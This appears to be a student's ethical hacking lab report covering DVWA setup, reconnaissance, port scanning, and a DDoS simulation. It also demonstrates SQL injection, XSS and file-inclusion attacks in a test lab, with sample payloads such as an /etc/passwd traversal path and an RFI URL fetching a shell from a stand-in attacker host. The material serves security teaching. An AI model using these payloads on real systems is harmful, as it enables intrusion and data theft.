0% found this document useful (0 votes)
12 views12 pages

Ehsd Lab File

The document outlines a series of experiments conducted in an Ethical Hacking and System Design course, focusing on various tools and techniques for testing web vulnerabilities. Each experiment includes aims, explanations, tools used, procedures, and conclusions, covering topics like SQL Injection, Cross-Site Scripting, and DDoS attacks. The overall goal is to provide hands-on experience in identifying and exploiting vulnerabilities in web applications and networks.

Uploaded by

xybezy
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
12 views12 pages

Ehsd Lab File

The document outlines a series of experiments conducted in an Ethical Hacking and System Design course, focusing on various tools and techniques for testing web vulnerabilities. Each experiment includes aims, explanations, tools used, procedures, and conclusions, covering topics like SQL Injection, Cross-Site Scripting, and DDoS attacks. The overall goal is to provide hands-on experience in identifying and exploiting vulnerabilities in web applications and networks.

Uploaded by

xybezy
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

EHSD Lab Practical

Name: Saurabh Sharma


Enrollment No: 22STUJPBY0042
SUBJECT: Ethical Hacking and System
Design
COURSE: BCA (Cyber Security)
Experiment 1: Installation of DVWA
 CO-PO Mapping: CO2

 Aim: To install and configure Damn Vulnerable Web Application (DVWA) on a local
machine for testing vulnerabilities.

 Explanation:
DVWA is a PHP/MySQL web application that is extremely vulnerable to common web
vulnerabilities. It is used by security professionals to practice penetration testing and
understand how real attacks work. It includes modules for SQL Injection, XSS, CSRF,
and more.

 Tools Used:

o XAMPP/WAMP

o DVWA source code

o Web browser

 Procedure:

o Install XAMPP or WAMP server.

o Download DVWA from GitHub.

o Place DVWA folder inside htdocs.

o Start Apache and MySQL from XAMPP.

o Open browser and go to localhost/dvwa.

o Configure the config.inc.php file.

o Create the database and setup login.

 Conclusion:
DVWA was successfully installed and configured. The lab environment is ready for
further testing of web vulnerabilities.

 Screenshot:
Experiment 2: Reconnaissance
 Aim: To perform reconnaissance on a target system using various information-
gathering tools.

 Explanation:
Reconnaissance is the first phase in ethical hacking, used to gather information about
a target before launching any attack. It can be passive (without direct contact) or
active (directly probing systems).

 Tools Used:
o WHOIS
o Nslookup
o Google Hacking
o Maltego
 Procedure:
o Use WHOIS to gather domain details.
o Use Nslookup to find IP and DNS records.
o Use Google advanced operators for open data.
o Use Maltego for visual mapping of data.

 Conclusion:
Reconnaissance helps in understanding the attack surface of a target by gathering
public and technical information.

 Screenshot:
Experiment 3: NeoTrace Tool
 Aim: To trace the route from source to destination using NeoTrace and analyze each
network hop.

 Explanation:
NeoTrace is a network diagnostic tool that provides graphical path tracing to a
destination. It helps in understanding the number of hops and delays between the
source and destination server.

 Tools Used:

o NeoTrace

o Internet connection

 Procedure:

o Open NeoTrace application.

o Enter the target IP or domain.

o Start trace and wait for route analysis.

o Analyze the geographic path and response times.

 Conclusion:
NeoTrace successfully mapped the route to the destination, providing insight into the
network path and latency.

 Screenshot:
Experiment 4: Visual Look Out Tool
 Aim: To use the Visual Lookout tool for real-time monitoring and scanning of
systems.

 Explanation:
Visual Lookout is a network monitoring tool that shows graphical representations of
network traffic and intrusion attempts. It helps administrators visualize suspicious
activity.

 Tools Used:

o Visual Lookout Tool

 Procedure:

o Install Visual Lookout.

o Configure the network interface.

o Monitor live network traffic.

o Identify any unauthorized or suspicious IP addresses.

 Conclusion:
The tool successfully visualized traffic, allowing monitoring of live threats and
suspicious behaviour.

 Screenshot:
Experiment 5: SuperScan and NMap
 CO-PO Mapping: CO1, CO2

 Aim: To scan open ports and services on a network using SuperScan and NMap.

 Explanation:
SuperScan and NMap are powerful tools for port scanning and network mapping.
They help find vulnerabilities in open ports and identify active devices and services.

 Tools Used:

o SuperScan

o Nmap

 Procedure:
o Launch SuperScan and NMap tools.
o Enter target IP addresses.
o Perform a TCP scan.
o View the open ports, protocols, and services.

 Conclusion:
Port scanning with SuperScan and NMap helps discover vulnerabilities and
understand the services running on a system.

 Screenshot:
Experiment 6: IP Network Browser
 Aim: To analyse and monitor IP-based devices using IP Network Browser.

 Explanation:
IP Network Browser allows you to scan your network and find all active IP devices. It
helps in identifying unauthorized devices and ensures the network is secure.

 Tools Used:

o IP Network Browser

 Procedure:

o Install and open the IP Network Browser.

o Scan the local network.

o Observe the list of connected devices.

o Check IP, MAC addresses, and status.

 Conclusion:
IP Network Browser is effective for monitoring connected devices and helps maintain
a secure internal network.

 Screenshot:
Experiment 7: Exploiting SQL Injection
 Aim: To demonstrate SQL Injection vulnerability and how attackers can use it to gain
unauthorized access.

 Explanation:
SQL Injection is a code injection technique used to manipulate the database of a web
application. It can be used to retrieve, alter, or delete database information without
authorization.

 Tools Used:

o DVWA

o Web browser

 Procedure:

o Open DVWA and log in.

o Go to the SQL Injection module.

o Enter SQL payload like ' OR '1'='1.

o Observe unauthorized data access.

 Conclusion:
SQL Injection vulnerability was successfully exploited to retrieve protected user data,
highlighting poor validation.

 Screenshot:
Experiment 8: Exploiting Cross-Site Scripting (XSS)
 Aim: To understand and demonstrate the XSS vulnerability in web applications.

 Explanation:
Cross-Site Scripting allows attackers to inject malicious scripts into web pages viewed
by other users. It is often used to steal cookies, session tokens, or redirect users.

 Tools Used:

o DVWA

o Web browser

 Procedure:

o Open DVWA and log in.

o Navigate to the XSS module.

o Inject a script like <script>alert('Hacked')</script>.

o Observe the pop-up or script execution.

 Conclusion:
XSS vulnerability allows execution of malicious scripts, showing how critical input
validation is for web apps.

 Screenshot:
Experiment 9: DDoS Attack Demonstration
 Aim: To simulate a Distributed Denial-of-Service (DDoS) attack and understand its
effects.

 Explanation:
DDoS attacks aim to flood a target system with traffic from multiple sources, making
the service unavailable to legitimate users.

 Tools Used:

o LOIC (Low Orbit Ion Cannon) or similar simulation tool

 Procedure:

o Set up a controlled environment (VMs).

o Launch DDoS simulation tool.

o Target a local test server.

o Observe server slowdown or crash.

 Conclusion:
DDoS attacks can severely disrupt services and require mitigation techniques like
firewalls, rate-limiting, and CDNs.

 Screenshot:
Experiment 10: LFI and RFI Exploitation
 CO-PO Mapping: CO4

 Aim: To demonstrate Local File Inclusion (LFI) and Remote File Inclusion (RFI)
vulnerabilities.

 Explanation:
LFI and RFI allow attackers to include files on a server through the web browser. LFI
includes local server files while RFI includes external files. These are common in
misconfigured servers.

 Tools Used:

o DVWA or custom vulnerable web app

 Procedure:

o Open DVWA and access the File Inclusion module.

o Modify the URL to include? page=../../../../etc/passwd (for LFI).

o For RFI, include a URL like ?page=http://evil.com/shell.txt.

o Observe file content inclusion.

 Conclusion:
LFI and RFI can expose sensitive data or execute remote scripts, highlighting the
importance of validating file inputs.

 Screenshot:

You might also like